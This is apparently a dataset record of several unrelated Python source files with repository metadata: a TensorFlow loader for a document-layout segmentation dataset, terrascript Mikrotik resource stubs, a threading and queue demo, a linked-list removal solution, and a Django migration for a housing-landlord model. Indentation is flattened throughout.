|
LivingSkyTechnologies/Document_Layout_Segmentation
|
0db00a18fb39afa1efa8ae183bbd57309a6ebfcf
|
[
"MIT"
] | 2
|
2021-01-28T13:39:33.000Z
|
2022-01-15T19:17:13.000Z
|
import pickle
import os
import tensorflow as tf
from glob import glob
import utils.DataLoaderUtils as dlu
from utils.AnnotationUtils import write_dad_masks
# Static Dataset Config Options
TAG_NAMES = {'highlights',
'urls_to_supplementary',
'abbreviation',
'abstract',
'additional_file',
'affiliation',
'appendice',
'author_bio',
'author_contribution',
'author_name',
'availability_of_data',
'caption',
'conflict_int',
'contact_info',
'copyright',
'core_text',
'date',
'doi',
'figure',
'funding_info',
'index',
'keywords',
'list',
'math_formula',
'note',
'publisher_note',
'reference',
'section_heading',
'subheading',
'table',
'title',
'nomenclature',
'code',
'publisher',
'journal',
'corresponding_author',
'editor',
'ethics',
'consent_publication',
'MSC',
'article_history',
'acknowledgment',
'background'}
TAG_MAPPING = {'abbreviation': 'background',
'acknowledgment': 'background',
'additional_file': 'background',
'affiliation': 'background',
'article_history': 'background',
'author_contribution': 'background',
'availability_of_data': 'background',
'code': 'background',
'conflict_int': 'background',
'consent_publication': 'background',
'corresponding_author': 'background',
'date': 'background',
'ethics': 'background',
'index': 'background',
'journal': 'background',
'nomenclature': 'background',
'publisher_note': 'background',
'urls_to_supplementary': 'background',
'msc': 'background',
'MSC': 'background',
'highlights': 'background',
'subheading': 'section_heading'}
SAVED_PKL_FILE = 'saved_dad_paths.pkl'
BUFFER_SIZE = 500
MASKS_DIR = "masks"
DOCUMENTS_DIR = "documents"
ANNOTATIONS_DIR = "annotations"
def write_masks(dataset_dir, border_buffer=6):
anno_dir = os.path.join(dataset_dir, ANNOTATIONS_DIR)
anno_paths = glob(anno_dir + "/*/*json")
if os.path.exists(SAVED_PKL_FILE):
all_used_tags, class_mapping = pickle.load(open(SAVED_PKL_FILE, 'rb'))
else:
print("Running full mask generation, this may take a bit.")
all_used_tags = {}
for anno_json in anno_paths:
_, class_mapping, used_tags = write_dad_masks(anno_json,
ANNOTATIONS_DIR,
DOCUMENTS_DIR,
MASKS_DIR,
tag_names=TAG_NAMES,
tag_mapping=TAG_MAPPING,
buffer_size=border_buffer,
force=True)
all_used_tags.update(used_tags)
pickle.dump((all_used_tags, class_mapping), open(SAVED_PKL_FILE, 'wb'))
return all_used_tags, class_mapping
def build_dad_dataset(dataset_dir, img_size, batch_size, seed, debug=False):
all_used_tags, class_mapping = write_masks(dataset_dir)
# Filter out any pages that have no classes (this is helpful when messing around with active classes)
filtered_used_tags = {}
for path, used_tags in all_used_tags.items():
if len(used_tags) != 0:
filtered_used_tags[path] = used_tags
# Split the paths with stratified sampling, to mainting class distribution
train_paths, test_paths = dlu.stratify_train_test_split(filtered_used_tags, 0.10, seed=seed, debug=debug)
#%% - further split the test set into test and validation sets
test_used_tags = {}
for path, used_tags in filtered_used_tags.items():
if path in test_paths:
test_used_tags[path] = used_tags
test_paths, valid_paths = dlu.stratify_train_test_split(test_used_tags, 0.50, seed=seed, debug=debug)
train_dataset = tf.data.Dataset.from_tensor_slices(train_paths)
train_dataset = train_dataset.map(lambda x: dlu.parse_image(x, 0, MASKS_DIR), num_parallel_calls=tf.data.experimental.AUTOTUNE)
valid_dataset = tf.data.Dataset.from_tensor_slices(valid_paths)
valid_dataset = valid_dataset.map(lambda x: dlu.parse_image(x, 0, MASKS_DIR), num_parallel_calls=tf.data.experimental.AUTOTUNE)
test_dataset = tf.data.Dataset.from_tensor_slices(test_paths)
test_dataset = test_dataset.map(lambda x: dlu.parse_image(x, 0, MASKS_DIR), num_parallel_calls=tf.data.experimental.AUTOTUNE)
train = train_dataset.map(lambda x: dlu.load_image_train(x, img_size), num_parallel_calls=tf.data.experimental.AUTOTUNE)
train = train.shuffle(buffer_size=BUFFER_SIZE, seed=seed, reshuffle_each_iteration=True)
train = train.padded_batch(batch_size, drop_remainder=True, padded_shapes=([img_size, img_size, 3], [img_size, img_size, 1], [None, 4]))
train = train.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
valid = valid_dataset.map(lambda x: dlu.load_image_test(x, img_size), num_parallel_calls=tf.data.experimental.AUTOTUNE)
valid = valid.padded_batch(batch_size, drop_remainder=True, padded_shapes=([img_size, img_size, 3], [img_size, img_size, 1], [None, 4]))
valid = valid.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
test = test_dataset.map(lambda x: dlu.load_image_test(x, img_size), num_parallel_calls=tf.data.experimental.AUTOTUNE)
test = test.padded_batch(batch_size, drop_remainder=True, padded_shapes=([img_size, img_size, 3], [img_size, img_size, 1], [None, 4]))
test = test.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return train, valid, test, class_mapping
| 42.76
| 140
| 0.588868
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,481
| 0.230901
|
4248c96a6cf8583046ad1cd239d37aa7ac5e5d96
| 740
|
py
|
Python
|
terrascript/resource/ddelnano/mikrotik.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/ddelnano/mikrotik.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/ddelnano/mikrotik.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/ddelnano/mikrotik.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:21:43 UTC)
import terrascript
class mikrotik_bgp_instance(terrascript.Resource):
pass
class mikrotik_bgp_peer(terrascript.Resource):
pass
class mikrotik_dhcp_lease(terrascript.Resource):
pass
class mikrotik_dns_record(terrascript.Resource):
pass
class mikrotik_pool(terrascript.Resource):
pass
class mikrotik_scheduler(terrascript.Resource):
pass
class mikrotik_script(terrascript.Resource):
pass
__all__ = [
"mikrotik_bgp_instance",
"mikrotik_bgp_peer",
"mikrotik_dhcp_lease",
"mikrotik_dns_record",
"mikrotik_pool",
"mikrotik_scheduler",
"mikrotik_script",
]
| 17.209302
| 73
| 0.754054
| 388
| 0.524324
| 0
| 0
| 0
| 0
| 0
| 0
| 252
| 0.340541
|
424a2a5c3d067c0a48cf8560895baac37e4bf0ea
| 812
|
py
|
Python
|
test/threaddd.py
|
liaohongdong/IPProxy
|
90152f02708717c661b7c1532e4a131a55103950
|
[
"MIT"
] | null | null | null |
test/threaddd.py
|
liaohongdong/IPProxy
|
90152f02708717c661b7c1532e4a131a55103950
|
[
"MIT"
] | 1
|
2021-03-31T19:17:41.000Z
|
2021-03-31T19:17:41.000Z
|
test/threaddd.py
|
liaohongdong/IPProxy
|
90152f02708717c661b7c1532e4a131a55103950
|
[
"MIT"
] | null | null | null |
import time
import queue
import threading
def aaa(i):
while True:
item = q.get()
if item is None:
print("线程%s发现了一个None,可以休息了^-^" % i)
break
time.sleep(0.01)
print('aaaaa -> ' + str(i) + " ---> " + str(item))
q.task_done()
if __name__ == '__main__':
num_of_threads = 5
source = [i for i in range(1, 21)]
q = queue.Queue()
threads = []
for i in range(1, num_of_threads + 1):
t = threading.Thread(target=aaa, args=(i,))
threads.append(t)
t.start()
for item in source:
time.sleep(0.01)
q.put(item)
q.join()
# print("-----工作都完成了-----")
# # 停止工作线程
for i in range(num_of_threads):
q.put(None)
# for t in threads:
# t.join()
# print(threads)
| 20.820513
| 58
| 0.507389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 187
| 0.217442
|
424a464b22116de9e6ed995f96ff3b93bc5bdfe1
| 665
|
py
|
Python
|
Codes/Liam/203_remove_linked_list_elements.py
|
liuxiaohui1221/algorithm
|
d80e64185ceb4798ac5389bfbd226dc1d406f6b5
|
[
"Apache-2.0"
] | 256
|
2017-10-25T13:02:15.000Z
|
2022-02-25T13:47:59.000Z
|
Codes/Liam/203_remove_linked_list_elements.py
|
liuxiaohui1221/algorithm
|
d80e64185ceb4798ac5389bfbd226dc1d406f6b5
|
[
"Apache-2.0"
] | 56
|
2017-10-27T01:34:20.000Z
|
2022-03-01T00:20:55.000Z
|
Codes/Liam/203_remove_linked_list_elements.py
|
liuxiaohui1221/algorithm
|
d80e64185ceb4798ac5389bfbd226dc1d406f6b5
|
[
"Apache-2.0"
] | 83
|
2017-10-25T12:51:53.000Z
|
2022-02-15T08:27:03.000Z
|
# 执行用时 : 68 ms
# 内存消耗 : 16.6 MB
# 方案:哨兵结点 sentinel,插入在head结点之前
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeElements(self, head: ListNode, val: int) -> ListNode:
# 哨兵结点 sentinel,插入在head结点之前
sentinel = ListNode(0)
sentinel.next = head
# 初始化两个指针 curr 和 prev
prev, curr = sentinel, head
while curr:
if curr.val == val:
prev.next = curr.next
else:
prev = curr
# 遍历下一个元素
curr = curr.next
return sentinel.next
| 22.166667
| 67
| 0.538346
| 517
| 0.675817
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.452288
|
424d5b248c6b3fcd0ec5e3855e8a59d969b36415
| 1,296
|
py
|
Python
|
bailleurs/migrations/0001_initial.py
|
MTES-MCT/appel
|
3b840ccea600ef31cfea57721fe5e6edbdbc2c79
|
[
"MIT"
] | null | null | null |
bailleurs/migrations/0001_initial.py
|
MTES-MCT/appel
|
3b840ccea600ef31cfea57721fe5e6edbdbc2c79
|
[
"MIT"
] | 2
|
2021-12-15T05:10:43.000Z
|
2021-12-15T05:11:00.000Z
|
bailleurs/migrations/0001_initial.py
|
MTES-MCT/appel
|
3b840ccea600ef31cfea57721fe5e6edbdbc2c79
|
[
"MIT"
] | 1
|
2021-12-28T13:06:06.000Z
|
2021-12-28T13:06:06.000Z
|
# Generated by Django 3.2.5 on 2021-07-06 14:18
import uuid
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Bailleur",
fields=[
("id", models.AutoField(primary_key=True, serialize=False)),
("uuid", models.UUIDField(default=uuid.uuid4, editable=False)),
("nom", models.CharField(max_length=255)),
("siret", models.CharField(max_length=14)),
("capital_social", models.CharField(max_length=255)),
("siege", models.CharField(max_length=255)),
("dg_nom", models.CharField(max_length=255)),
("dg_fonction", models.CharField(max_length=255)),
("dg_date_deliberation", models.DateField()),
("operation_exceptionnelle", models.TextField()),
("cree_le", models.DateTimeField(auto_now_add=True)),
("mis_a_jour_le", models.DateTimeField(auto_now=True)),
],
options={
"permissions": (
("can_edit_bailleur", "Créer ou mettre à jour un bailleur"),
),
},
),
]
| 35.027027
| 80
| 0.548611
| 1,193
| 0.919106
| 0
| 0
| 0
| 0
| 0
| 0
| 265
| 0.20416
|